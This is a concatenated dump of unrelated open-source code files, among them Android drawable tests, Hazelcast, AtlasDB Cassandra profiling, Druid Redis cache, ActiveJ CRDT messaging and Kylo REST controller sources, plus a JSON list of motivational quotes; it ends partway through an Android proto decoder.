mRoundedBitmapDrawableWithNullBitmap.setRadius(0); assertFalse(mRoundedBitmapDrawableWithNullBitmap.shouldRound()); } @Test public void testShouldRoundRadii() { mRoundedBitmapDrawable.setRadii(new float[] {0, 0, 0, 0, 0, 0, 0, 1}); assertTrue(mRoundedBitmapDrawable.shouldRound()); mRoundedBitmapDrawable.setRadii(new float[] {0, 0, 0, 0, 0, 0, 0, 0}); assertFalse(mRoundedBitmapDrawable.shouldRound()); mRoundedBitmapDrawableWithNullBitmap.setRadii(new float[] {0, 0, 0, 0, 0, 0, 0, 1}); assertFalse(mRoundedBitmapDrawableWithNullBitmap.shouldRound()); mRoundedBitmapDrawableWithNullBitmap.setRadii(new float[] {0, 0, 0, 0, 0, 0, 0, 0}); assertFalse(mRoundedBitmapDrawableWithNullBitmap.shouldRound()); } @Test public void testShouldRoundCircle() { mRoundedBitmapDrawable.setCircle(true); assertTrue(mRoundedBitmapDrawable.shouldRound()); mRoundedBitmapDrawable.setCircle(false); assertFalse(mRoundedBitmapDrawable.shouldRound()); mRoundedBitmapDrawableWithNullBitmap.setCircle(true); assertFalse(mRoundedBitmapDrawableWithNullBitmap.shouldRound()); mRoundedBitmapDrawableWithNullBitmap.setCircle(false); assertFalse(mRoundedBitmapDrawableWithNullBitmap.shouldRound()); } @Test public void testShouldRoundBorder() { mRoundedBitmapDrawable.setBorder(0xFFFFFFFF, 1); assertTrue(mRoundedBitmapDrawable.shouldRound()); mRoundedBitmapDrawable.setBorder(0x00000000, 0); assertFalse(mRoundedBitmapDrawable.shouldRound()); mRoundedBitmapDrawableWithNullBitmap.setBorder(0xFFFFFFFF, 1); assertFalse(mRoundedBitmapDrawableWithNullBitmap.shouldRound()); mRoundedBitmapDrawableWithNullBitmap.setBorder(0x00000000, 0); assertFalse(mRoundedBitmapDrawableWithNullBitmap.shouldRound()); } @Test public void testPreservePaintOnDrawableCopy() { ColorFilter colorFilter = mock(ColorFilter.class); Paint originalPaint = mock(Paint.class); BitmapDrawable originalVersion = mock(BitmapDrawable.class); originalPaint.setColorFilter(colorFilter); when(originalVersion.getPaint()).thenReturn(originalPaint); RoundedBitmapDrawable roundedVersion = RoundedBitmapDrawable.fromBitmapDrawable(mResources, originalVersion); assertEquals( originalVersion.getPaint().getColorFilter(), roundedVersion.getPaint().getColorFilter()); } }
2,228
709
package com.olacabs.jackhammer.models.mapper; import com.olacabs.jackhammer.models.Repo; import org.skife.jdbi.v2.StatementContext; import org.skife.jdbi.v2.tweak.ResultSetMapper; import java.sql.ResultSet; import java.sql.SQLException; public class RepoMapper implements ResultSetMapper<Repo> { public Repo map(int index, ResultSet resultSet, StatementContext statementContext) throws SQLException { Repo repo = new Repo(); repo.setId(resultSet.getLong("id")); repo.setName(resultSet.getString("name")); repo.setTarget(resultSet.getString("target")); repo.setGroupId(resultSet.getLong("groupId")); repo.setUserId(resultSet.getLong("userId")); repo.setOwnerTypeId(resultSet.getLong("ownerTypeId")); repo.setScanTypeId(resultSet.getLong("scanTypeId")); return repo; } }
341
325
<gh_stars>100-1000 { "data": [ { "author": "<NAME>", "quote": "The main reason we waste time on small things is that we haven’t identified our big things." }, { "author": "<NAME>", "quote": "The only limits on your life are those that you set yourself." }, { "author": "<NAME>", "quote": "Every thought plants a seed to one of your actions. Every action, good or bad, will yield a consequence. The person who takes good steps every day, cannot help but reap a harvest of awesome results." }, { "author": "<NAME>", "quote": "Dream up a vision so brave it makes all around you roll with laughter." }, { "author": "<NAME>", "quote": "Be so good at what you do that you leave people breathless by your performance." }, { "author": "<NAME>", "quote": "The only failure is not trying." }, { "author": "<NAME>", "quote": "Today with love and respect, I challenge you to do one thing that you never thought you could do. This day’s your platform to transform." }, { "author": "<NAME>", "quote": "Once you surrender to your vision, success begins to chase you." }, { "author": "<NAME>", "quote": "To have what few have, do what few do." }, { "author": "<NAME>", "quote": "When you’re old, you’ll have wished you dreamed bigger, reached higher and achieved more. So why wait until you’re old?" }, { "author": "<NAME>", "quote": "As you live your hours, so you create your years. As you live your days, so you craft your life." }, { "author": "<NAME>", "quote": "Until your dream dominates your mindset, you’ll never wake up your greatness." }, { "author": "<NAME>", "quote": "Never lose the sparkle in your eye, the fire in your belly and the steel in your character." }, { "author": "<NAME>", "quote": "Less talk, more do. Less selfish, more selfless." }, { "author": "<NAME>", "quote": "To construct an awesome life, build your daily life around your deepest priorities." }, { "author": "<NAME>", "quote": "Elite performance is never luck. It’s hard work." }, { "author": "<NAME>", "quote": "Genius is more about what you have the discipline to say no to versus yes to." }, { "author": "<NAME>", "quote": "Great achievement often happens when our backs are up against the wall." }, { "author": "<NAME>", "quote": "Dedicate yourself to expressing your best." }, { "author": "<NAME>", "quote": "Love is the secret weapon of the iconic entrepreneur. Work with love, lead with love, serve with love. Do these and you become undefeatable." } ] }
1,065
515
package com.bj58.argo.interceptor; import com.bj58.argo.ActionResult; import com.bj58.argo.BeatContext; /** * 方法执行前的拦截处理,可以与 * @see PostInterceptor * 共同实现,也可以单独使用 * * @see PreInterceptorAnnotation */ public interface PreInterceptor { /** * 拦截当前请求 * @param beat 当前请求的上下文 * @return * null,进入下一个拦截或执行Action * <BR/> * 非空,直接显示,不进入下一个拦截或执行Action */ public ActionResult preExecute(BeatContext beat); }
321
4,283
<reponame>larrydiamond/hazelcast<filename>hazelcast/src/test/java/com/hazelcast/test/starter/constructor/DataAwareEntryEventConstructor.java /* * Copyright (c) 2008-2021, Hazelcast, Inc. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.hazelcast.test.starter.constructor; import com.hazelcast.test.starter.HazelcastStarterConstructor; import java.lang.reflect.Constructor; import static com.hazelcast.test.starter.HazelcastProxyFactory.proxyArgumentsIfNeeded; import static com.hazelcast.test.starter.ReflectionUtils.getFieldValueReflectively; @HazelcastStarterConstructor(classNames = {"com.hazelcast.map.impl.DataAwareEntryEvent"}) public class DataAwareEntryEventConstructor extends AbstractStarterObjectConstructor { public DataAwareEntryEventConstructor(Class<?> targetClass) { super(targetClass); } @Override Object createNew0(Object delegate) throws Exception { // locate required classes on target class loader ClassLoader starterClassLoader = targetClass.getClassLoader(); Class<?> dataClass = starterClassLoader.loadClass("com.hazelcast.internal.serialization.Data"); Class<?> memberClass = starterClassLoader.loadClass("com.hazelcast.cluster.Member"); Class<?> serServiceClass = starterClassLoader.loadClass("com.hazelcast.internal.serialization.SerializationService"); Constructor<?> constructor = targetClass.getConstructor(memberClass, Integer.TYPE, String.class, dataClass, dataClass, dataClass, dataClass, serServiceClass); Object serializationService = getFieldValueReflectively(delegate, "serializationService"); Object source = getFieldValueReflectively(delegate, "source"); Object member = getFieldValueReflectively(delegate, "member"); Object entryEventType = getFieldValueReflectively(delegate, "entryEventType"); Integer eventTypeId = (Integer) entryEventType.getClass().getMethod("getType").invoke(entryEventType); Object dataKey = getFieldValueReflectively(delegate, "dataKey"); Object dataNewValue = getFieldValueReflectively(delegate, "dataNewValue"); Object dataOldValue = getFieldValueReflectively(delegate, "dataOldValue"); Object dataMergingValue = getFieldValueReflectively(delegate, "dataMergingValue"); Object[] args = new Object[]{ member, eventTypeId, source, dataKey, dataNewValue, dataOldValue, dataMergingValue, serializationService, }; Object[] proxiedArgs = proxyArgumentsIfNeeded(args, starterClassLoader); return constructor.newInstance(proxiedArgs); } }
1,110
2,151
<filename>third_party/blink/renderer/core/html/custom/custom_element_definition_builder.h // Copyright 2016 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef THIRD_PARTY_BLINK_RENDERER_CORE_HTML_CUSTOM_CUSTOM_ELEMENT_DEFINITION_BUILDER_H_ #define THIRD_PARTY_BLINK_RENDERER_CORE_HTML_CUSTOM_CUSTOM_ELEMENT_DEFINITION_BUILDER_H_ #include "base/macros.h" #include "third_party/blink/renderer/core/core_export.h" #include "third_party/blink/renderer/core/css/css_style_sheet.h" #include "third_party/blink/renderer/core/html/custom/custom_element_definition.h" #include "third_party/blink/renderer/platform/wtf/allocator.h" namespace blink { class CustomElementDescriptor; class CustomElementRegistry; // Implement CustomElementDefinitionBuilder to provide // technology-specific steps for CustomElementRegistry.define. // https://html.spec.whatwg.org/multipage/scripting.html#dom-customelementsregistry-define class CORE_EXPORT CustomElementDefinitionBuilder { STACK_ALLOCATED(); public: // This API necessarily sounds JavaScript specific; this implements // some steps of the CustomElementRegistry.define process, which // are defined in terms of JavaScript. // Check the constructor is valid. Return false if processing // should not proceed. virtual bool CheckConstructorIntrinsics() = 0; // Check the constructor is not already registered in the calling // registry. Return false if processing should not proceed. virtual bool CheckConstructorNotRegistered() = 0; // Checking the prototype may destroy the window. Return false if // processing should not proceed. virtual bool CheckPrototype() = 0; // Cache properties for build to use. Return false if processing // should not proceed. virtual bool RememberOriginalProperties() = 0; // Produce the definition. This must produce a definition. virtual CustomElementDefinition* Build(const CustomElementDescriptor&, CustomElementDefinition::Id) = 0; protected: CustomElementDefinitionBuilder() = default; DISALLOW_COPY_AND_ASSIGN(CustomElementDefinitionBuilder); }; } // namespace blink #endif // THIRD_PARTY_BLINK_RENDERER_CORE_HTML_CUSTOM_CUSTOM_ELEMENT_DEFINITION_BUILDER_H_
724
862
/* * (c) Copyright 2018 Palantir Technologies Inc. All rights reserved. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.palantir.atlasdb.keyvalue.cassandra; import com.palantir.atlasdb.keyvalue.api.TableReference; import com.palantir.atlasdb.keyvalue.cassandra.thrift.ThriftObjectSizeUtils; import com.palantir.atlasdb.logging.KvsProfilingLogger; import com.palantir.atlasdb.logging.LoggingArgs; import com.palantir.logsafe.SafeArg; import java.nio.ByteBuffer; import java.util.Collection; import java.util.List; import java.util.Map; import org.apache.cassandra.thrift.CASResult; import org.apache.cassandra.thrift.Column; import org.apache.cassandra.thrift.ColumnOrSuperColumn; import org.apache.cassandra.thrift.Compression; import org.apache.cassandra.thrift.ConsistencyLevel; import org.apache.cassandra.thrift.CqlResult; import org.apache.cassandra.thrift.InvalidRequestException; import org.apache.cassandra.thrift.KeyPredicate; import org.apache.cassandra.thrift.KeyRange; import org.apache.cassandra.thrift.KeySlice; import org.apache.cassandra.thrift.Mutation; import org.apache.cassandra.thrift.NotFoundException; import org.apache.cassandra.thrift.SchemaDisagreementException; import org.apache.cassandra.thrift.SlicePredicate; import org.apache.cassandra.thrift.TimedOutException; import org.apache.cassandra.thrift.UnavailableException; import org.apache.thrift.TException; @SuppressWarnings({"all"}) // thrift variable names. public class ProfilingCassandraClient implements AutoDelegate_CassandraClient { private final CassandraClient client; public ProfilingCassandraClient(CassandraClient client) { this.client = client; } @Override public CassandraClient delegate() { return this.client; } @Override public Map<ByteBuffer, List<ColumnOrSuperColumn>> multiget_slice( String kvsMethodName, TableReference tableRef, List<ByteBuffer> keys, SlicePredicate predicate, ConsistencyLevel consistency_level) throws InvalidRequestException, UnavailableException, TimedOutException, TException { int numberOfKeys = keys.size(); int numberOfColumns = predicate.slice_range.count; long startTime = System.currentTimeMillis(); return KvsProfilingLogger.maybeLog( (KvsProfilingLogger.CallableCheckedException<Map<ByteBuffer, List<ColumnOrSuperColumn>>, TException>) () -> client.multiget_slice(kvsMethodName, tableRef, keys, predicate, consistency_level), (logger, timer) -> logger.log( "CassandraClient.multiget_slice({}, {}, {}, {}) at time {}, on kvs.{} took {} ms", LoggingArgs.tableRef(tableRef), LoggingArgs.keyCount(numberOfKeys), LoggingArgs.columnCount(numberOfColumns), SafeArg.of("consistency", consistency_level.toString()), LoggingArgs.startTimeMillis(startTime), SafeArg.of("kvsMethodName", kvsMethodName), LoggingArgs.durationMillis(timer)), (logger, rowsToColumns) -> logger.log( "and returned {} cells in {} rows with {} bytes", LoggingArgs.cellCount(countCells(rowsToColumns.values())), LoggingArgs.rowCount(rowsToColumns.size()), LoggingArgs.sizeInBytes(ThriftObjectSizeUtils.getApproximateSizeOfColsByKey(rowsToColumns)))); } @Override public Map<ByteBuffer, List<List<ColumnOrSuperColumn>>> multiget_multislice( String kvsMethodName, TableReference tableRef, List<KeyPredicate> keyPredicates, ConsistencyLevel consistency_level) throws InvalidRequestException, UnavailableException, TimedOutException, TException { int numberOfKeyPredicates = keyPredicates.size(); long startTime = System.currentTimeMillis(); return KvsProfilingLogger.maybeLog( () -> client.multiget_multislice(kvsMethodName, tableRef, keyPredicates, consistency_level), (logger, timer) -> logger.log( "CassandraClient.multiget_multislice({}, {}, {}) at time {}, on kvs.{}" + " took {} ms", LoggingArgs.tableRef(tableRef), SafeArg.of("numberOfKeyPredicates", numberOfKeyPredicates), SafeArg.of("consistency", consistency_level.toString()), LoggingArgs.startTimeMillis(startTime), SafeArg.of("kvsMethodName", kvsMethodName), LoggingArgs.durationMillis(timer)), (logger, rowsToColumnLists) -> logger.log( "and returned {} cells in {} rows with {} bytes", LoggingArgs.cellCount(countCellsAcrossKeys(rowsToColumnLists)), LoggingArgs.rowCount(rowsToColumnLists.size()), LoggingArgs.sizeInBytes( ThriftObjectSizeUtils.getApproximateSizeOfColListsByKey(rowsToColumnLists)))); } @Override public List<KeySlice> get_range_slices( String kvsMethodName, TableReference tableRef, SlicePredicate predicate, KeyRange range, ConsistencyLevel consistency_level) throws InvalidRequestException, UnavailableException, TimedOutException, TException { int numberOfKeys = predicate.slice_range.count; int numberOfColumns = range.count; long startTime = System.currentTimeMillis(); return KvsProfilingLogger.maybeLog( (KvsProfilingLogger.CallableCheckedException<List<KeySlice>, TException>) () -> client.get_range_slices(kvsMethodName, tableRef, predicate, range, consistency_level), (logger, timer) -> logger.log( "CassandraClient.get_range_slices({}, {}, {}, {}) at time {}, on kvs.{} took {} ms", LoggingArgs.tableRef(tableRef), LoggingArgs.keyCount(numberOfKeys), LoggingArgs.columnCount(numberOfColumns), SafeArg.of("consistency", consistency_level.toString()), LoggingArgs.startTimeMillis(startTime), SafeArg.of("kvsMethodName", kvsMethodName), LoggingArgs.durationMillis(timer)), (logger, rows) -> logger.log( "and returned {} rows with {} bytes", LoggingArgs.rowCount(rows.size()), LoggingArgs.sizeInBytes(ThriftObjectSizeUtils.getApproximateSizeOfKeySlices(rows)))); } @Override public void remove( String kvsMethodName, TableReference tableRef, byte[] row, long timestamp, ConsistencyLevel consistency_level) throws InvalidRequestException, UnavailableException, TimedOutException, TException { long startTime = System.currentTimeMillis(); KvsProfilingLogger.maybeLog( (KvsProfilingLogger.CallableCheckedException<Void, TException>) () -> { client.remove(kvsMethodName, tableRef, row, timestamp, consistency_level); return null; }, (logger, timer) -> logger.log( "CassandraClient.remove({}, {}, {}, {}) at time {}, on kvs.{} took {} ms", LoggingArgs.tableRef(tableRef), SafeArg.of("timestamp", timestamp), SafeArg.of("consistency", consistency_level.toString()), LoggingArgs.startTimeMillis(startTime), SafeArg.of("kvsMethodName", kvsMethodName), LoggingArgs.durationMillis(timer))); } @Override public void batch_mutate( String kvsMethodName, Map<ByteBuffer, Map<String, List<Mutation>>> mutation_map, ConsistencyLevel consistency_level) throws InvalidRequestException, UnavailableException, TimedOutException, TException { long startTime = System.currentTimeMillis(); KvsProfilingLogger.maybeLog( (KvsProfilingLogger.CallableCheckedException<Void, TException>) () -> { client.batch_mutate(kvsMethodName, mutation_map, consistency_level); return null; }, (logger, timer) -> { logger.log("CassandraClient.batch_mutate("); ThriftObjectSizeUtils.getSizeOfMutationPerTable(mutation_map) .forEach((tableName, size) -> { logger.log( "{} -> {}", LoggingArgs.safeInternalTableNameOrPlaceholder(tableName), LoggingArgs.sizeInBytes(size)); }); logger.log( ") with consistency {} at time {}, on kvs.{} took {} ms", SafeArg.of("consistency", consistency_level.toString()), LoggingArgs.startTimeMillis(startTime), SafeArg.of("kvsMethodName", kvsMethodName), LoggingArgs.durationMillis(timer)); }); } @Override public ColumnOrSuperColumn get( TableReference tableReference, ByteBuffer key, byte[] column, ConsistencyLevel consistency_level) throws InvalidRequestException, NotFoundException, UnavailableException, TimedOutException, TException { long startTime = System.currentTimeMillis(); return KvsProfilingLogger.maybeLog( (KvsProfilingLogger.CallableCheckedException<ColumnOrSuperColumn, TException>) () -> client.get(tableReference, key, column, consistency_level), (logger, timer) -> logger.log( "CassandraClient.get({}, {}) at time {} took {} ms", LoggingArgs.tableRef(tableReference), SafeArg.of("consistency", consistency_level.toString()), LoggingArgs.startTimeMillis(startTime), LoggingArgs.durationMillis(timer))); } @Override public CASResult cas( TableReference tableReference, ByteBuffer key, List<Column> expected, List<Column> updates, ConsistencyLevel serial_consistency_level, ConsistencyLevel commit_consistency_level) throws InvalidRequestException, UnavailableException, TimedOutException, TException { long startTime = System.currentTimeMillis(); return KvsProfilingLogger.maybeLog( (KvsProfilingLogger.CallableCheckedException<CASResult, TException>) () -> client.cas( tableReference, key, expected, updates, serial_consistency_level, commit_consistency_level), (logger, timer) -> logger.log( "CassandraClient.cas({}) at time {} took {} ms", LoggingArgs.tableRef(tableReference), LoggingArgs.startTimeMillis(startTime), LoggingArgs.durationMillis(timer))); } @Override public CqlResult execute_cql3_query(CqlQuery cqlQuery, Compression compression, ConsistencyLevel consistency) throws InvalidRequestException, UnavailableException, TimedOutException, SchemaDisagreementException, TException { long startTime = System.currentTimeMillis(); return KvsProfilingLogger.maybeLog( (KvsProfilingLogger.CallableCheckedException<CqlResult, TException>) () -> client.execute_cql3_query(cqlQuery, compression, consistency), cqlQuery::logSlowResult, (logger, cqlResult) -> { if (cqlResult.getRows() == null) { // different from an empty list logger.log( "and returned null rows. The query was started at time {}", LoggingArgs.startTimeMillis(startTime)); } else { logger.log( "and returned {} rows. The query was started at time {}", SafeArg.of("numRows", cqlResult.getRows().size()), LoggingArgs.startTimeMillis(startTime)); } }); } private static int countCellsAcrossKeys(Map<ByteBuffer, List<List<ColumnOrSuperColumn>>> rowsToColumnLists) { return rowsToColumnLists.values().stream() .mapToInt(ProfilingCassandraClient::countCells) .sum(); } private static int countCells(Collection<List<ColumnOrSuperColumn>> values) { return values.stream().mapToInt(List::size).sum(); } }
6,393
5,813
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.apache.druid.client.cache; import org.apache.commons.lang.StringUtils; import org.apache.druid.java.util.common.IAE; import redis.clients.jedis.HostAndPort; import redis.clients.jedis.JedisCluster; import redis.clients.jedis.JedisPool; import redis.clients.jedis.JedisPoolConfig; import java.util.Arrays; import java.util.Set; import java.util.stream.Collectors; public class RedisCacheFactory { public static Cache create(final RedisCacheConfig config) { if (config.getCluster() != null && StringUtils.isNotBlank(config.getCluster().getNodes())) { Set<HostAndPort> nodes = Arrays.stream(config.getCluster().getNodes().split(",")) .map(String::trim) .filter(StringUtils::isNotBlank) .map(hostAndPort -> { int index = hostAndPort.indexOf(':'); if (index <= 0 || index == hostAndPort.length()) { throw new IAE("Invalid redis cluster configuration: %s", hostAndPort); } int port; try { port = Integer.parseInt(hostAndPort.substring(index + 1)); } catch (NumberFormatException e) { throw new IAE("Invalid port in %s", hostAndPort); } if (port <= 0 || port > 65535) { throw new IAE("Invalid port in %s", hostAndPort); } return new HostAndPort(hostAndPort.substring(0, index), port); }).collect(Collectors.toSet()); JedisPoolConfig poolConfig = new JedisPoolConfig(); poolConfig.setMaxTotal(config.getMaxTotalConnections()); poolConfig.setMaxIdle(config.getMaxIdleConnections()); poolConfig.setMinIdle(config.getMinIdleConnections()); JedisCluster cluster; if (config.getPassword() != null) { cluster = new JedisCluster( nodes, config.getTimeout().getMillisecondsAsInt(), //connection timeout config.getTimeout().getMillisecondsAsInt(), //read timeout config.getCluster().getMaxRedirection(), config.getPassword().getPassword(), poolConfig ); } else { cluster = new JedisCluster( nodes, config.getTimeout().getMillisecondsAsInt(), //connection timeout and read timeout config.getCluster().getMaxRedirection(), poolConfig ); } return new RedisClusterCache(cluster, config); } else { if (StringUtils.isBlank(config.getHost())) { throw new IAE("Invalid redis configuration. no redis server or cluster configured."); } JedisPoolConfig poolConfig = new JedisPoolConfig(); poolConfig.setMaxTotal(config.getMaxTotalConnections()); poolConfig.setMaxIdle(config.getMaxIdleConnections()); poolConfig.setMinIdle(config.getMinIdleConnections()); return new RedisStandaloneCache( new JedisPool( poolConfig, config.getHost(), config.getPort(), config.getTimeout().getMillisecondsAsInt(), //connection timeout and read timeout config.getPassword() == null ? null : config.getPassword().getPassword(), config.getDatabase(), null ), config ); } } }
2,138
432
<gh_stars>100-1000 /* * Copyright (C) 2020 ActiveJ LLC. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package io.activej.crdt; import com.dslplatform.json.*; import java.util.Arrays; import java.util.Map; import static com.dslplatform.json.JsonWriter.*; import static java.util.function.Function.identity; import static java.util.stream.Collectors.toMap; public final class CrdtMessaging { public interface CrdtMessage {} public interface CrdtResponse {} @CompiledJson public enum CrdtMessages implements CrdtMessage { UPLOAD, REMOVE, PING } public static final class Download implements CrdtMessage { private final long token; public Download(long token) { this.token = token; } public long getToken() { return token; } @Override public String toString() { return "Download{token=" + token + '}'; } } @CompiledJson public enum CrdtResponses implements CrdtResponse { UPLOAD_FINISHED, REMOVE_FINISHED, PONG, DOWNLOAD_STARTED } public static final class ServerError implements CrdtResponse { private final String msg; public ServerError(String msg) { this.msg = msg; } public String getMsg() { return msg; } @Override public String toString() { return "ServerError{msg=" + msg + '}'; } } @SuppressWarnings("unused") static class JsonConverters { @JsonConverter(target = CrdtMessage.class) public static class CrdtMessageConverter { public static final JsonReader.ReadObject<CrdtMessage> JSON_READER = typedReader(CrdtMessages.class, Download.class); public static final JsonWriter.WriteObject<CrdtMessage> JSON_WRITER = typedWriter(); } @JsonConverter(target = CrdtResponse.class) public static class CrdtResponseConverter { public static final JsonReader.ReadObject<CrdtResponse> JSON_READER = typedReader(CrdtResponses.class, ServerError.class); public static final JsonWriter.WriteObject<CrdtResponse> JSON_WRITER = typedWriter(); } @SafeVarargs static <T> JsonReader.ReadObject<T> typedReader(Class<? extends T>... types) { Map<String, Class<? extends T>> typeMap = Arrays.stream(types) .collect(toMap(Class::getSimpleName, identity())); return reader -> { if (reader.wasNull()) return null; if (reader.last() != OBJECT_START) throw reader.newParseError("Expected '{'"); reader.getNextToken(); String type = reader.readString(); reader.semicolon(); T result; Class<? extends T> aClass = typeMap.get(type); if (aClass == null) { throw ParsingException.create("Unknown type: " + type, true); } //noinspection unchecked result = (T) reader.next(aClass); reader.endObject(); return result; }; } static <T> JsonWriter.WriteObject<T> typedWriter() { return (writer, value) -> { if (value == null) { writer.writeNull(); return; } writer.writeByte(OBJECT_START); writer.writeString(value.getClass().getSimpleName()); writer.writeByte(SEMI); writer.serializeObject(value); writer.writeByte(OBJECT_END); }; } } }
1,264
1,016
<reponame>peter-ls/kylo package com.thinkbiganalytics.jobrepo.rest.controller; /*- * #%L * thinkbig-job-repository-controller * %% * Copyright (C) 2017 ThinkBig Analytics * %% * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * #L% */ import com.thinkbiganalytics.jobrepo.security.OperationsAccessControl; import com.thinkbiganalytics.metadata.api.MetadataAccess; import com.thinkbiganalytics.metadata.api.jobrepo.nifi.NifiFeedProcessorStatisticsProvider; import com.thinkbiganalytics.metadata.api.jobrepo.nifi.NifiFeedProcessorStats; import com.thinkbiganalytics.metadata.rest.jobrepo.nifi.NifiFeedProcessorStatsTransform; import com.thinkbiganalytics.rest.model.LabelValue; import com.thinkbiganalytics.security.AccessController; import org.joda.time.DateTime; import org.springframework.beans.factory.annotation.Autowired; import java.util.Arrays; import java.util.List; import java.util.stream.Collectors; import javax.inject.Inject; import javax.ws.rs.DefaultValue; import javax.ws.rs.GET; import javax.ws.rs.Path; import javax.ws.rs.PathParam; import javax.ws.rs.Produces; import javax.ws.rs.core.MediaType; import javax.ws.rs.core.Response; import io.swagger.annotations.Api; import io.swagger.annotations.ApiOperation; import io.swagger.annotations.ApiResponse; import io.swagger.annotations.ApiResponses; @Api(tags = "Operations Manager - Feeds", produces = "application/json") @Path("/v1/provenance-stats") public class NifiFeedProcessorStatisticsRestController { @Inject private MetadataAccess metadataAccess; @Inject private AccessController accessController; @Autowired private NifiFeedProcessorStatisticsProvider statsProvider; @GET @Path("/all") @Produces(MediaType.APPLICATION_JSON) @ApiOperation("Gets the provenance statistics for all feeds.") @ApiResponses( @ApiResponse(code = 200, message = "Returns the provenance stats.", response = com.thinkbiganalytics.metadata.rest.jobrepo.nifi.NifiFeedProcessorStats.class, responseContainer = "List") ) public Response findStats() { this.accessController.checkPermission(AccessController.SERVICES, OperationsAccessControl.ACCESS_OPS); return metadataAccess.read(() -> { List<? extends NifiFeedProcessorStats> list = statsProvider.findWithinTimeWindow(DateTime.now().minusDays(1), DateTime.now()); List<com.thinkbiganalytics.metadata.rest.jobrepo.nifi.NifiFeedProcessorStats> model = NifiFeedProcessorStatsTransform.toModel(list); return Response.ok(model).build(); }); } @GET @Path("/{feedName}/processor-duration/{timeframe}") @Produces(MediaType.APPLICATION_JSON) @ApiOperation("Gets the job duration for the specified feed.") @ApiResponses( @ApiResponse(code = 200, message = "Returns the job duration.", response = com.thinkbiganalytics.metadata.rest.jobrepo.nifi.NifiFeedProcessorStats.class, responseContainer = "List") ) public Response findStats(@PathParam("feedName") String feedName, @PathParam("timeframe") @DefaultValue("THREE_MIN") NifiFeedProcessorStatisticsProvider.TimeFrame timeframe) { this.accessController.checkPermission(AccessController.SERVICES, OperationsAccessControl.ACCESS_OPS); return metadataAccess.read(() -> { List<? extends NifiFeedProcessorStats> list = statsProvider.findFeedProcessorStatisticsByProcessorName(feedName, timeframe); List<com.thinkbiganalytics.metadata.rest.jobrepo.nifi.NifiFeedProcessorStats> model = NifiFeedProcessorStatsTransform.toModel(list); return Response.ok(model).build(); }); } @GET @Path("/{feedName}/{timeframe}") @Produces(MediaType.APPLICATION_JSON) @ApiOperation("Gets the statistics for the specified feed.") @ApiResponses( @ApiResponse(code = 200, message = "Returns the feed statistics.", response = com.thinkbiganalytics.metadata.rest.jobrepo.nifi.NifiFeedProcessorStats.class, responseContainer = "List") ) public Response findFeedStats(@PathParam("feedName") String feedName, @PathParam("timeframe") @DefaultValue("THREE_MIN") NifiFeedProcessorStatisticsProvider.TimeFrame timeframe) { this.accessController.checkPermission(AccessController.SERVICES, OperationsAccessControl.ACCESS_OPS); return metadataAccess.read(() -> { List<? extends NifiFeedProcessorStats> list = statsProvider.findForFeedStatisticsGroupedByTime(feedName, timeframe); List<com.thinkbiganalytics.metadata.rest.jobrepo.nifi.NifiFeedProcessorStats> model = NifiFeedProcessorStatsTransform.toModel(list); return Response.ok(model).build(); }); } @GET @Path("/time-frame-options") @Produces(MediaType.APPLICATION_JSON) @ApiOperation("Gets the default time frame options.") @ApiResponses( @ApiResponse(code = 200, message = "Returns the time frame options.", response = LabelValue.class, responseContainer = "List") ) public Response getTimeFrameOptions() { List<LabelValue> vals = Arrays.stream(NifiFeedProcessorStatisticsProvider.TimeFrame.values()) .map(timeFrame -> new LabelValue(timeFrame.getDisplayName(), timeFrame.name())) .collect(Collectors.toList()); return Response.ok(vals).build(); } }
2,004
831
/* * Copyright (C) 2018 The Android Open Source Project * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.android.tools.idea.resources.aar; import com.android.aapt.Resources; import com.android.utils.XmlUtils; import java.util.ArrayList; import java.util.List; import org.jetbrains.annotations.NotNull; /** * Static methods for converting {@link Resources.StyledString} proto message back to the original XML string. */ class ProtoStyledStringDecoder { /** * Decodes the given {@link Resources.StyledString} proto message to obtain the original XML string. * * @param styledStringMsg the proto message to decode * @return the original XML string */ @NotNull public static String getRawXmlValue(@NotNull Resources.StyledString styledStringMsg) { String text = styledStringMsg.getValue(); StringBuilder xmlValue = new StringBuilder(text.length() * 2); List<Resources.StyledString.Span> spanList = styledStringMsg.getSpanList(); 